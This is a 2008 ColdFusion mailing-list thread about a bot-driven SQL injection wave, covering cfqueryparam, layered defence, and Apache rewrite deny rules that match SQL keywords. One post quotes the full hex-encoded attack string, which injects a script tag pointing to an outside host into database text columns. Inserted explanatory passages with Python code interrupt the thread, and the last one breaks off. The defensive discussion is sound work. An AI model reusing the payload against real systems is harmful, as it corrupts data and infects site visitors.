Seriously, thanks everyone!

~David G. Moore, Jr.

Author:
Mike Kear
08/20/2008 06:47 PM

Don't feel bad, David. I am a freelance CF programmer. I spend most of my time working on bug fixes or feature enhancements on code written by others. And the vast majority of files I work on have no <cfqueryparam>. Most of the code I work on really needs re-writing from scratch, it's so poorly written. At least in my experience, very few CF programmers use <cfqueryparam>. It's quite frightening really. Not only is the code vulnerable to attack, it's slow, inefficient, and often just plain wrong.

I'd say one of the best things you have ever done as a CF programmer is join this list and pay attention to the things clever folks like Dave Watts have to say. Rare is the day when I don't learn something useful on this list.

--
Cheers
Mike Kear
Windsor, NSW, Australia
Adobe Certified Advanced ColdFusion Developer
AFP Webworks
http://afpwebworks.com
ColdFusion, PHP, ASP, ASP.NET hosting from AUD$15/month

Author:
Mary Jo Sminkey
08/20/2008 11:34 PM

> P.S. Speaking of Smack Downs, Mary Jo's got a great right cross :) Go
> get 'em girl!

LOL, actually I am a pacifist at heart and always try to not lose my temper (serves me well with customers, particularly the endlessly annoying ones!)

As for not knowing what cfqueryparam is and how to properly secure an application (there's more to it than just cfqueryparam), hopefully all these issues that people are dealing with will help such information make its way into even beginner CF materials, and not have it be so much of an afterthought as it seems to have been up to this point.

--- Mary Jo

Author:
David Moore, Jr.
08/20/2008 11:59 PM

> Actually I am a pacifist at heart and always try to not lose my temper (serves me well with customers, particularly the endlessly annoying ones!)

LOLOL. I am actually a moderately conservative liberal. I believe in losing my temper only when I know I can't find it.

> As for not knowing what cfqueryparam is and how to properly secure an application (there's more to it than just cfqueryparam), hopefully all these issues that people are dealing with will help such information make its way into even beginner CF materials, and not have it be so much of an afterthought as it seems to have been up to this point.

On a serious note, it would have been nice if I had been more aware when I started coding those many years ago. I have more lines of code that need reworking than I care to think of, but I have to start somewhere.

> --- Mary Jo

Thanks for your help today! You have been incredibly patient and kind. Now, I must go home because my wife has called for her third and last time, which means I am on the couch...

~David "Rock" Moore

Author:
Kelly
08/20/2008 05:51 PM

As someone who was hit by the attack on the first day, I will say I've used cfqueryparam for years and yet I had a handful of pages with old code where I was not using cfqueryparam. It just takes one page that's publicly accessible to do damage. Once I fixed the pages in question, try as they might, I have not been affected since. Using cfqueryparam is a good habit to get into, to protect your sites and client sites.

I was also running a forum program I purchased years ago, CFForum2000 I think, and all the code in that product was not using cfqueryparam either. I had to go through and edit the code throughout. It's possible their newer versions are using proper coding, but it was a bit of a pain, and really my own fault for not rechecking that code long ago.

Kelly

David Moore, Jr. wrote:
----- Excess quoted text cut - see Original Post for more -----

Author:
Eric Cobb
08/20/2008 06:03 PM

> is <cfqueryparam> something a lot of programmers really use?

Only the good ones. ;)

Thanks,

Eric

David Moore, Jr. wrote:
----- Excess quoted text cut - see Original Post for more -----

Author:
Mark Kruger
08/20/2008 06:07 PM

Eric,

A good answer might be .... "it is now" :)

> > is <cfqueryparam> something a lot of programmers really use?
>
> Only the good ones. ;)
>
> Thanks,
>
> Eric

Author:
David Moore, Jr.
08/20/2008 06:09 PM

Well, it is my goal :) not there yet...

> > is <cfqueryparam> something a lot of programmers really use?
>
> Only the good ones. ;)
>
> Eric

Author:
Mike Kear
08/20/2008 06:36 PM

A while ago I read a totally riveting book called "The Art Of Intrusion" by Kevin D Mitnick, the legendary hacker who was sent to jail for his intrusion exploits. He runs a security company now that tests your security and reports back on how well you've done.

He says one of the most common failures of security systems of all kinds is that they rely on a secure perimeter. The theory is that if we keep the hordes out of the city at the boundaries, that's all we need to do. Unfortunately all the bad guys need is a single crack in that outer perimeter and they can go wherever they like. So his hacking attempts usually meant hunting for some hole in the wall, and once through that hole the entire enterprise was laid out for the taking. He'd find a router left online but unsecured by some lazy support person who wanted to be able to work from home. Or a long-forgotten modem somewhere, and once through that security hole, there were no other security blockers and the whole network was his for the raping and pillaging.

The lesson we learn from this? Don't rely on only one defense mechanism. All it takes is one crack in that armour and you're dead. You need to use all the weapons you have at your disposal. In this case, we need to use the Regex blockers, <cfqueryparam>, strong passwords, regular password changing, separate physical machines for web and database - everything you can think of to make it more difficult for the attackers.

That book was a great read on its own, but a real education for me as a web developer. I heartily recommend it. The opening chapter is highly amusing - where he is hired to probe security at a company, and at the review meeting where he presented his report, he said "Yes, I managed to get in and managed to get some unauthorised access. And I think you should have done a better job on your application for a raise. And did you know you are being paid less than others of equivalent rank in your company? Oh, and the profits you're going to report next month are x xx xx .. you have a secretary who is having an affair with one of your senior execs." When their mouths gaped open he finished it with the clincher .. "Oh, and this PC I'm using for the presentation - it's yours. Your security manager gave it to me, along with remote admin access to your network, and I have been working remotely through your network for the past month."

A fantastic read.

Cheers
Mike Kear
Windsor, NSW, Australia
Adobe Certified Advanced ColdFusion Developer
AFP Webworks
http://afpwebworks.com
ColdFusion, PHP, ASP, ASP.NET hosting from AUD$15/month

Author:
Sandra Clark
08/21/2008 02:13 PM

Funny, I went to high school with him. Had a comp sci class with him where he spent quite a bit of time trying to get passwords from unsuspecting people.

> A while ago I read a totally riveting book called "The Art Of Intrusion" by Kevin D Mitnick, the legendary hacker who was sent to jail for his intrusion exploits. He runs a security company now that tests your security and reports back on how well you've done.

Author:
David Moore, Jr.
08/20/2008 06:19 PM

So, I have found like the "Mother Lode" of good programmers who really care about ColdFusion and take the time to do it right? Because every piece of code I have ever gotten from Adobe Exchange or purchased from other sites has never had <cfqueryparam>. And I know Ben is going to shoot me, because looking back at some of his Advanced books now I see where he says I should be using it.

I guess my 10 hour days just turned into 14 hours. Anybody got a Starbucks Supersize Java Java Double Caffeine coupon?

Eric is pretty good at the Smack Down too: Eric The Great takes David the Geek over the ropes and into the first row of chairs! (Yes, I am from the South and everything references Wrestling or NASCAR.)

~David

Author:
Justin Scott
08/20/2008 06:30 PM

> So, I have found like the "Mother Load" of good programmers who really care about Cold Fusion and take the time to do it right?

Pretty much. The skill level on the list varies from "can express the meaning of life in ColdFusion" to "what's a database" so your experience may vary. I'd like to think that everyone here, including me, is looking to learn through the experience of others, so you're in the right place. Welcome!

-Justin Scott

Author:
Mary Jo Sminkey
08/20/2008 11:37 PM

> Eric is pretty good at the Smack Down too, Eric The Great takes David
> the Geek over the ropes and into the first row of chairs! (Yes, I am
> from the South and everything references Wrestling or Nascar)

Here's another "smack down" for you....it would be nice if you could remove all the extra quoted stuff on your posts....take a look at the online web archives, it really makes a mess of the thread!

--- Mary Jo

Author:
David Moore, Jr.
08/20/2008 11:48 PM

Mary Jo, Sorry. Didn't see all that. First time using this kind of post.

> Here's another "smack down" for you....it would be nice if you could remove all the extra quoted stuff on your posts....take a look at the online web archives, it really makes a mess of the thread!

Will do better in the future. No way for me to go in and edit that once it is posted? YUCK. Where's a good Langolier when you need one? Thanks for the education though.

~David

P.S. I like your Smack Downs. You got GRIT! Were you wearing a cape or mask when you wrote that SMACK!?

Author:
Jochem van Dieten
08/21/2008 12:55 AM

David Moore, Jr. wrote:
> I am currently using the SQLprev.cfm from Jochem

The what from whom?

Jochem

Author:
David Moore, Jr.
08/21/2008 12:59 AM

OK. I thought it was from you. I was sent an email with the link to SQLprev.cfm in an email and they referenced I use your suggestion in the email as well. I stuck the two together.

> David Moore, Jr. wrote:
> > I am currently using the SQLprev.cfm from Jochem

Jochem wrote?
> The what from whom?

Please don't shoot me. I am new to all this? Sleep deprived...

~David

Author:
Matthew Smith
08/22/2008 08:23 PM

I've upgraded to the latest version of Mary Jo's tool to filter attempts at SQL injection. It works well, but I found three interesting false positives today. My site has community profiles for cities and towns. The URL for these profiles includes the county name as well as the city or town name. There are Union counties in North Carolina, New Jersey and Ohio. There are three towns that get a false positive flag. They all start with "All" (Allenwood, Allen Center and Allens Crossroads). The URLs have the format of /Union/Allenwood.cfm, /Union/Allen-Center.cfm and /Union/Allens-Crossroads.cfm. Clearly, the combination of "Union/All" is causing the problem.

Can anyone suggest a modification to the code that would eliminate the false positives without substantially weakening the filter? The RegEx in her tool, (http://www.cfwebstore.com/index.cfm?fuseaction=page.download&downloadID=18), is way beyond my skill set.

TIA, Matt

----- Excess quoted text cut - see Original Post for more -----

Author:
Mary Jo Sminkey
08/22/2008 09:16 PM

> Can anyone suggest a modification to the code
> that would eliminate the false positives without substantially
> weakening the filter?

The one in there now is by Luis Melo and his email is in the credits. You might want to send them along to him as I know he plans to work more on reducing the false positives as he has time. It's definitely a challenge to make sure you catch everything bad and let everything good through, so some false positives are probably inevitable.

--- Mary Jo

Author:
Mary Jo Sminkey
08/22/2008 09:17 PM

> My site has community profiles for cities and towns. The URL for these
> profiles includes the county name as well as the city or town name.
> There are Union counties in North Carolina, New Jersey and Ohio.

Or...maybe you could just get the states to rename that county. ;-)

Author:
Matthew Smith
08/23/2008 12:18 PM

Mary Jo, I've done some additional testing and have found that the prior version of the SQL Injection Blocker does better when challenged with the HP Scrawlr testing tool than the newest version. Rolling back to the prior release also solved the false positive problem for the three towns mentioned earlier.

Matt

Author:
Mary Jo Sminkey
08/23/2008 03:24 PM

> I've done some additional testing and have found that the prior
> version of the SQL Injection Blocker does better when challenged with
> the HP Scrawlr testing tool then the newest version. Rolling back to
> the prior release also solved the false positive problem for the three
> towns mentioned earlier.

Hmm, interesting. My own customers ran into several problems with that version, that have been fixed with the new one. I'm not surprised it does better with scrawlr though as for us it had way more false positives and was blocking *too* much stuff. Just goes to show, there's no one solution that works for everyone...and how important it is not to rely on these tools exclusively since they clearly do not work 100% of the time.

--- Mary Jo
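The "Union/All" false positive Matt describes above comes from a keyword pattern that does not care what sits between the two words. This is an added example, not code from the thread or from Mary Jo's tool (whose regex the thread never reproduces): a constructed loose pattern that reproduces the false positive beside a word-boundary-anchored form that still catches a real UNION ALL clause, evaluated over constructed requests including the three town URLs.

```python
import re
from urllib.parse import unquote

# Constructed stand-in for a loose keyword filter of the kind the thread
# describes (NOT the regex from Mary Jo's / Luis Melo's tool). It flags
# "union" followed anywhere by "all", so /Union/Allenwood.cfm trips it.
LOOSE_UNION_ALL = re.compile(r"union.*all", re.IGNORECASE)

# Tighter form: both keywords must be whole words separated only by
# whitespace, which is how they appear in a UNION ALL clause but not in a
# path segment such as Union/Allenwood.
STRICT_UNION_ALL = re.compile(r"\bunion\s+all\b", re.IGNORECASE)


def is_flagged(pattern: re.Pattern, request: str) -> bool:
    """Apply a filter pattern to a URL-decoded request (path plus query)."""
    return pattern.search(unquote(request)) is not None


# Constructed sample requests (True = should be blocked). The first three are
# the town pages from the thread; the last is shaped like a UNION ALL probe.
SAMPLE_REQUESTS = {
    "/Union/Allenwood.cfm": False,
    "/Union/Allen-Center.cfm": False,
    "/Union/Allens-Crossroads.cfm": False,
    "/Union/Barnesville.cfm": False,
    "/profile.cfm?town=1%20UNION%20ALL%20SELECT%201": True,
}


def evaluate(pattern: re.Pattern) -> dict:
    """Report false positives (benign requests flagged) and misses
    (malicious requests not flagged) for one pattern over the samples."""
    false_positives = [r for r, bad in SAMPLE_REQUESTS.items()
                       if not bad and is_flagged(pattern, r)]
    misses = [r for r, bad in SAMPLE_REQUESTS.items()
              if bad and not is_flagged(pattern, r)]
    return {"false_positives": false_positives, "misses": misses}


if __name__ == "__main__":
    for label, pat in (("loose", LOOSE_UNION_ALL), ("strict", STRICT_UNION_ALL)):
        print(label, evaluate(pat))
```

The loose pattern flags all three "All" towns with no misses; the strict pattern flags none of them and still catches the probe, which is the trade-off Mary Jo's reply points at.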

Author:
denstar
08/08/2008 11:22 PM

I think it goes:

  RewriteCond %{QUERY_STRING} .*DECLARE.* [NC]

to have the no-case option. Thanks for clarifying the loadmodule stuff, I should'a said something along those lines earlier.

--
Employ your time in improving yourself by other men's writings, so that you shall gain easily what others have labored hard for. Socrates

----- Excess quoted text cut - see Original Post for more -----

Author:
Dana Kowalski
08/11/2008 12:27 PM

Seeing code solutions to this is cool, but imho it's best left to your router/firewall to handle. I'd contact the provider to have them put some better controls in place. These are scenarios that almost delve into why Cisco has the zero day features on their gear..

Author:
Wil Genovese
08/11/2008 12:48 PM

Security in layers. While it is usually best to thwart this style of attack at the router/firewall, it is wise to have the extra layers at the Apache/IIS/webserver, ColdFusion Application, CF Query and JDBC DB user permission layers. If the first layer is bypassed or compromised then the next layer catches the attack and so on. Having security in layers makes it that much harder for someone to launch a successful attack.

Wil Genovese
Sr. Web Application Developer

On Mon, Aug 11, 2008 at 11:22 AM, Dana Kowalski <DanaKowalski@gmail.com> wrote:
> Seeing code solutions to this is cool. but imho its best left to your
> router/firewall to handle. I'd contact the provider to have them put some
> better controls in place. These are scenarios that almost delve into why
> cisco has the zero day features on their gear..

Author:
Raymond Camden
08/08/2008 11:51 PM

I've tried this on a windows apache server, but it doesn't seem to be working. Must it be in a VirtualDirectory block? I have it set outside so as to work on all sites. ----- Excess quoted text cut - see Original Post for more -----

Author:
denstar
08/09/2008 12:09 AM

A simple look at the docs would state why, but it doesn't appear to work if you've got it "floating" (rewrites in general). I don't remember, off hand.

I'm pretty sure it will work in a Directory or Location block too, tho.

--
Employ your time in improving yourself by other men's writings, so that you shall gain easily what others have labored hard for. Socrates

> I've tried this on a windows apache server, but it doesn't seem to be
> working. Must it be in a VirtualDirectory block? I have it set outside
> so as to work on all sites.

Author:
denstar
08/09/2008 12:11 AM

You can keep it in a different .conf file, and use the Include directive, to pull it in wherever you need it, BTW.

--
Employ your time in improving yourself by other men's writings, so that you shall gain easily what others have labored hard for. Socrates

> A simple look at the docs would state why, but it doesn't appear to
> work if you've got it "floating" (rewrites in general).  I don't
> remember, off hand.
>
> I'm pretty sure it will work in a Directory or Location block too, tho.

Author:
Raymond Camden
08/09/2008 12:16 AM

Hmm. I'm having no luck with this. I'm trying it on a blogcfc site, so it's being added after /...., so I also added path_info:

  RewriteEngine on
  RewriteCond %{QUERY_STRING} .*DECLARE.* [NC]
  RewriteRule ^(.*)$  /violation.htm
  RewriteCond %{PATH_INFO} .*DECLARE.* [NC]
  RewriteRule ^(.*)$  /violation.htm

And it's not picking up when it sees declare in the url.

----- Excess quoted text cut - see Original Post for more -----

Author:
denstar
08/09/2008 12:37 AM

Strange. And it looks like it /should/ work in the server conf too. Might be something like symlinks being turned off in the main Directory block or something. Try adding this (we'll leave off the ifModule, as we'd want an error if we don't have mod_rewrite loaded (and I'd try to limit where I'm allowing following of symlinks, doing rewriting, etc.):

  Options +FollowSymLinks
  # Required: This is a security feature of the rewrite engine and must be set. It informs Apache to follow the newly created link names.
  Options +Indexes
  # Optional, set it if you want to display a directory listing when no index page found (Uniform Server's default).
  RewriteEngine On
  # Required: Turns the rewrite engine on and must be set.
  RewriteCond %{QUERY_STRING} .*DECLARE.* [NC]
  RewriteRule .* /violation.htm [L]
  RewriteCond %{PATH_INFO} .*DECLARE.* [NC]
  RewriteRule .* /violation.htm [L]

And be sure that /violation.htm is a valid path to a file! That bit me for a little bit (wrong named file, didn't seem to do anything).

:DeN

--
Employ your time in improving yourself by other men's writings, so that you shall gain easily what others have labored hard for. Socrates

----- Excess quoted text cut - see Original Post for more -----

Author:
denstar
08/09/2008 12:51 AM

non-wrapped (and it was grabbed off the web somewhere):

  Options +FollowSymLinks
  Options +Indexes
  RewriteEngine On
  RewriteCond %{QUERY_STRING} .*DECLARE.* [NC]
  RewriteRule .* /violation.htm [L]
  RewriteCond %{PATH_INFO} .*DECLARE.* [NC]
  RewriteRule .* /violation.htm [L]

The [L] tells it to stop there, BTW.

Author:
denstar
08/09/2008 12:59 AM

Theoretically, it would be possible to write a code-review type tool that uses database introspection to rewrite queries to use the proper cfqueryparams everywhere. Wouldn't work for queries built by code tho, so... hmmm.... I wonder why we can't do something like that at a lower-level, ya know? Right before CF runs the query, verify that all params are bound to types? Use a bit of caching or something ta boot? Hmm... I'm digging on hibernate... ORMs are probably the answer, neh? Well, just random brainstorming...

--
Wholey moley! The opening of the Olympics was awesome!

Author:
Raymond Camden
08/09/2008 09:09 AM

No go. It's not life or death - Im still using cfqueryparam, but I'd love to get this working at the lowest level. ----- Excess quoted text cut - see Original Post for more -----

Author:
Raymond Camden
08/09/2008 09:16 AM

Ok, I've noticed that when I go to host.com/?declare it is working but host.com/x/index.cfm?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F73646F2E313030306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F73646F2E313030306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); Is not working ----- Excess quoted text cut - see Original Post for more -----

Author:
Wil Genovese
08/09/2008 10:02 AM

Ray,

Our sysadmin ran into the same issue when we started on this yesterday. Here is part of the rule we're using now and it works for the case yours does not. Note the ^.

  RewriteCond %{QUERY_STRING} ^.*DECLARE.*$

Wil Genovese

One man with courage makes a majority. -Andrew Jackson
A fine is a tax for doing wrong. A tax is a fine for doing well.

Author:
Raymond Camden
08/09/2008 10:19 AM

Still no go for me. I appreciate the help from all. ----- Excess quoted text cut - see Original Post for more -----

Author:
Terry Ford
08/09/2008 12:56 AM

Hi Ray,

I used this rewrite in the root directory's .htaccess file (linux/apache)... try Windows equiv? I've run into the same problem that you describe using global rewrites in years past, but this directory-based method seems to work reliably.

  <Limit GET POST>
  order allow,deny
  allow from all
  RewriteEngine On
  .... rewrites here ....
  </Limit>

Regards

--- On Sat, 8/9/08, Raymond Camden <rcamden@gmail.com> wrote:
----- Excess quoted text cut - see Original Post for more -----

Author:
Matt Williams
08/09/2008 07:36 AM

----- Excess quoted text cut - see Original Post for more -----

Here's what I have within my <VirtualHost> block:

  RewriteEngine On
  RewriteOptions Inherit
  RewriteCond %{QUERY_STRING} .*DECLARE.* [NC]
  RewriteRule ^(.*)$  /violation.htm [nc,L]

Also, uncomment the LoadModule rewrite_module modules/mod_rewrite.so

And make sure you restarted Apache for changes to take effect.

With that I can do this and get redirected:
http://myDomain/?foo=declare
http://myDomain/?declare

--
Matt Williams
"It's the question that drives us."

Author:
Jon Clausen
08/09/2008 08:55 AM

Depending on your default directory settings in httpd.conf, you may need to add the following directory attributes as well to your site to allow mod_rewrite to operate:

  #Allow mod rewrite on this directory
  <Directory /srv/www/htdocs/mysite>
  Options FollowSymLinks
  AllowOverride All
  Order deny,allow
  Allow from all
  </Directory>

Also, you can use pipe delimiters in the RewriteCond to add additional SQL statements you might want to watch for (The syntax I'm seeing is mostly MSSQL specific, but that could change):

  #Add the following if the site isn't using mod_rewrite yet
  RewriteEngine on
  #SQL Injection Redirects
  # Spaces and the ( inside the pattern are backslash-escaped so Apache
  # neither splits the argument nor fails to compile the regex; [NC] on
  # the RewriteCond makes the keyword match case-insensitive
  RewriteCond %{QUERY_STRING} .*DECLARE.*|.*NVARCHAR.*|.*EXEC\ \(@.*|.*TRUNCATE\ TABLE.*|.*INSERT\ INTO.* [NC]
  RewriteRule ^(.*)$ /violation.htm [NC,L]

HTH,
Jon

On Aug 9, 2008, at 7:32 AM, Matt Williams wrote:
----- Excess quoted text cut - see Original Post for more -----

Author:
Jochem van Dieten
08/09/2008 06:28 AM

Terry Ford wrote:
> Pretty ingenious really, infecting websites via injection attack in order to infect clients with browser vulnerabilities.

In 2001 it was: http://www.cert.org/advisories/CA-2001-26.html

Now it is just business as usual.

Jochem

Author:
Terry Ford
08/09/2008 11:27 AM

Nimda did not use SQL injection as any sort of primary vector. SQL injection attacks have been around forever, but botnet/worm SQL injection attacks have really taken off pretty recently. It has gotten so bad that even Microsoft recently released a security advisory article that doesn't deal with a major flaw in its own software. That's rare ;)

http://www.microsoft.com/technet/security/advisory/954462.mspx

--- On Sat, 8/9/08, Jochem van Dieten <jochemd@oli.tudelft.nl> wrote:
----- Excess quoted text cut - see Original Post for more -----

Author:
Jochem van Dieten
08/09/2008 11:56 AM

Terry Ford wrote:
> Nimda did not use SQL injection as any sort of primary vector.

But it infected websites in order to infect browsers in order to infect websites etc. So the current wave of worms using the same mechanism is really 7 years too late to be ingenious.

Jochem

Author:
Andy Matthews
08/08/2008 02:28 PM

Hysterical!!

Ben Forta said ....
> On the plus side, it's nice to see CF finally getting the recognition it
> deserves, even if it is from parasitic bottom-feeding bots created by
> despicable scum-sucking feeble-excuse-for-a-carbon-based-life-form
> repugnant socially-inept basement-dwelling death-penalty-deserving hacker-wannabes.

----- Excess quoted text cut - see Original Post for more -----

What makes you think they're lawyers, Ben?

Mike Kear
Windsor, NSW, Australia
CEO AFP Webworks Pty Ltd
http://afpwebworks.com

Author:
Rick Faircloth
08/08/2008 01:40 PM

> even if it is from parasitic bottom-feeding bots created by
> despicable scum-sucking feeble-excuse-for-a-carbon-based-life-form repugnant
> socially-inept basement-dwelling death-penalty-deserving hacker-wannabes

Come on, Ben! Don't hold back! Tell us how you *really* feel! :o)

----- Excess quoted text cut - see Original Post for more -----

Author:
Dave Long
08/08/2008 02:13 PM

I've heard that in Saudi Arabia, a thief has the offending member removed at the wrist. Since hackers commit their offence with their brain, wouldn't it be appropriate to behead them? Just a suggestion. :-\ Dave L. ----- Excess quoted text cut - see Original Post for more -----

Author:
Larry Lyons
08/10/2008 09:02 PM

>I've heard that in Saudi Arabia, a thief has the offending member removed at
>the wrist. Since hackers commit their offence with their brain, wouldn't it
>be appropriate to behead them?
>
>Just a suggestion. :-\
>
>Dave L.

Personally I'd rather they had a different part of their anatomy cut off.

Mind you given they most likely live in their parent's basement, they probably would not miss it.

Author:
William Seiter
08/10/2008 11:19 PM

You assume much. Women are just as prowess at running a computer virus attack as men. We just don't hear about them as much, as they seem to not get caught as often. :)

::-----Original Message-----
::Sent: Sunday, August 10, 2008 5:57 PM
::To: CF-Talk
::Subject: Re: SQL injection attack on House of Fusion
::
::>I've heard that in Saudi Arabia, a thief has the offending member removed
::at
::>the wrist. Since hackers commit their offence with their brain, wouldn't
::it
::>be appropriate to behead them?
::>
::>Just a suggestion. :-\
::>
::>Dave L.
::
::Personally I'd rather they had a different part of their anatomy cut off.
::
::Mind you given they most likely live in their parent's basement, they
::probably would not miss it.

Author:
Dave Morris
08/10/2008 11:32 PM

You haven't been around teenage boys much recently. That and the XBox are the ONLY things they would miss.

Anyway, I propose the dot-com millionaires who left us stuck with the current mess in the spam and virus arena be personally required to fund an international Goon Squad with kneecap breaking instructions to go after these vandals. If someone did this crap to your house, you'd have the police and/or FBI out there in a heartbeat tracking down the criminals. This is criminal mischief on a global scale.

And if Interpol won't do anything about it, and if the powers that be refuse to attach any form of responsibility or traceability to the ownership of an IP address, then we may just have to implement vigilante measures and go after the crooks ourselves.

Dave Morris
(Owner of a huge web site who just spent 2 days fending off the barbarians at the gates)

>::-----Original Message-----
>::Mind you given they most likely live in their parent's basement, they
>::probably would not miss it.
>::
>::

Author:
Mike Kear
08/08/2008 10:47 AM

In the last 7 hours since I set up a counter on it, I've had 2792 on sites far lower volume than HouseofFusion.. So do I get a prize?

Cheers
Mike Kear
Windsor, NSW, Australia
Adobe Certified Advanced ColdFusion Developer
AFP Webworks
http://afpwebworks.com
ColdFusion, PHP, ASP, ASP.NET hosting from AUD$15/month

> Yeah, I've gotten a couple today.. but fortunately when Ray built
> BlogCFC. he covered his bases.
>
> Scott Stewart
> ColdFusion Developer

Author:
Don L
08/15/2008 03:55 PM

Sorry for the "top posting", where are we now in terms of best practice for cf8 protection against sql injection attack? Going through 136+ posts seems a bit too much, many thanks. Someone who has closely monitored this thread probably could help.

----- Excess quoted text cut - see Original Post for more -----

Author:
Justin Scott
08/15/2008 04:09 PM

> Sorry for the "top posting", where are we now in terms of best practice for cf8 protection again sql injection attack?  Going through 136+ posts seems a bit too much, many thanks.  Some one who has closely monitored this thread probably could help.

The same place we've always been:

* Validate user input
* Use CFQUERYPARAM

For applications that have old code, run a tool that will tell you what queries need to be updated or run a front-end filter that will do a basic check on input while you're updating that old code to use proper security methods.

CFQUERYPARAM:
http://www.adobe.com/devnet/coldfusion/articles/cfqueryparam.html

Query scanning tools:
http://www.codersrevolution.com/index.cfm/2008/7/24/Announcing-the-first-ever-International-Operation-cfSQLprotect

Basic URL value filter:
http://www.gravityfree.com/_sqlprev.cfm.txt

-Justin Scott
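Justin's second recommendation for old code is a tool that reports which queries still need updating; denstar earlier mused about the same kind of code-review tool. This is an added example, not code from the thread or from the linked cfSQLprotect tool: a minimal scanner that reports `#...#` interpolation inside `<cfquery>` bodies that is not wrapped in a `<cfqueryparam>` tag. The sample CFML is constructed; real CFML with `##` escapes or comments inside queries would need a proper parser.

```python
import re

# Constructed CFML sample (not from the thread): the first query interpolates
# URL values straight into SQL, the second binds them with cfqueryparam.
SAMPLE_CFML = """
<cfquery name="getUnsafe" datasource="site">
    SELECT name FROM towns WHERE id = #URL.id# AND county = '#URL.county#'
</cfquery>

<cfquery name="getSafe" datasource="site">
    SELECT name FROM towns
    WHERE id = <cfqueryparam value="#URL.id#" cfsqltype="cf_sql_integer">
      AND county = <cfqueryparam value="#URL.county#" cfsqltype="cf_sql_varchar">
</cfquery>
"""

# <cfquery\b stops this from also matching <cfqueryparam ...> tags.
CFQUERY_RE = re.compile(r"<cfquery\b([^>]*)>(.*?)</cfquery>",
                        re.IGNORECASE | re.DOTALL)
NAME_RE = re.compile(r'\bname\s*=\s*"([^"]*)"', re.IGNORECASE)
PARAM_TAG_RE = re.compile(r"<cfqueryparam\b[^>]*>", re.IGNORECASE)
# A #expression# pair; does not understand the ## literal-hash escape.
INTERP_RE = re.compile(r"#([^#]+)#")


def find_unparameterized(cfml: str) -> dict:
    """Map each cfquery name to the #expressions# that appear in its SQL
    outside any <cfqueryparam> tag. An empty list means the query binds
    everything it interpolates."""
    report = {}
    for attrs, body in CFQUERY_RE.findall(cfml):
        name_match = NAME_RE.search(attrs)
        qname = name_match.group(1) if name_match else "<unnamed>"
        # Remove every cfqueryparam tag (including its value="#...#"); any
        # #...# that survives is raw interpolation into the SQL text.
        stripped = PARAM_TAG_RE.sub("", body)
        report[qname] = [expr.strip() for expr in INTERP_RE.findall(stripped)]
    return report


if __name__ == "__main__":
    for query, exprs in find_unparameterized(SAMPLE_CFML).items():
        status = "needs cfqueryparam for " + ", ".join(exprs) if exprs else "ok"
        print(f"{query}: {status}")
```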

Author:
Don L
08/15/2008 04:18 PM

But I know all this, I thought the sql injection attack went beyond it, thanks anyway, Justin.

----- Excess quoted text cut - see Original Post for more -----

Author:
Charlie Griefer
08/15/2008 04:30 PM

On Fri, Aug 15, 2008 at 1:12 PM, D
> But I know all this, I thought the sql injection attack went beyond it,
> thanks anyway, Justin.

it did not.

--
A byte walks into a bar and orders a pint. Bartender asks him "What's wrong?" Byte says "Parity error." Bartender nods and says "Yeah, I thought you looked a bit off."

Author:
Justin Scott
08/15/2008 04:34 PM

> But I know all this, I thought the sql injection attack went beyond it, thanks anyway, Justin.

Not as far as technique, but it was much larger in scale than most of us have experienced before. Some were getting hit so hard they had to filter it farther up the chain (IIS, firewall, etc.) but for the majority of us the standard secure coding methods kept it out.

-Justin Scott

Author:
Wil Genovese
08/15/2008 04:52 PM

As an FYI: for those that did use Apache configs to stop this attack, if you did not make sure your check was not case sensitive you're being hit again. I just saw this start coming into our logs this afternoon:

Note that DECLARE changed to DeCLARE. Some of the posts I saw for people to modify apache were checking for DECLARE in case sensitive mode.

Cheers, It looks like the storm is still trying to rage.

Wil Genovese

;DeCLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x[...]xEC(@S);

On Fri, Aug 15, 2008 at 3:30 PM, Justin Scott <jscott@gravityfree.com> wrote:
----- Excess quoted text cut - see Original Post for more -----

Author:
David Moore
08/20/2008 02:07 PM

I am still getting around 50 to 75 attacks a day on about 20 of my websites. I applied the solution from JOCHEM that aborts the attack in the application.cfm file and then sends me an email. They just keep coming from different IP addresses so it is useless to do anything other than wait for the storm to pass and watch them eat up bandwidth. In the words of one of my all time favorites....AUGH! (that would be Charlie Brown for all you young ones)

David G. Moore, Jr.
UpstateWeb, LLC

Author:
Claude Schneegans
08/15/2008 06:37 PM

>>Not as far as technique, but it was much larger in scale than most of us have experience before.

By the way, are you still getting hits from this attack? I don't see any anymore.

--
_______________________________________
REUSE CODE! Use custom tags;
See http://www.contentbox.com/claude/customtags/tagstore.cfm
(Please send any spam to this address: piegeacon@internetique.com)
Thanks.

Author:
Brad Wood
08/15/2008 06:56 PM

They completely stopped on the 11th, but they are back today spelling it like "DeCLARE".

~Brad

> >>Not as far as technique, but it was much larger in scale than most of us
> have experience before.
>
> By the way, are you still getting hits from this attack?
> I don't see any anymore.

Author:
Al Musella, DPM
08/15/2008 10:11 PM

And changed EXEC to ExEC

I am getting hit pretty hard again. It stopped for a few days but they are back.

At 06:56 PM 8/15/2008, you wrote:
>They completely stopped on the 11th, but they are back to day spelling it
>like "DeCLARE".
>
>~Brad
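Wil, Brad and Al each report the same thing: the bot recased DECLARE and EXEC, and rules written without [NC] stopped matching. This is an added example, not code from the thread: a small model of RewriteCond matching (only the [NC] flag is modelled, which is an assumption of this illustration and not mod_rewrite's real parser) run over constructed query strings shaped like the ones quoted in the thread, with the hex blob replaced by "...".

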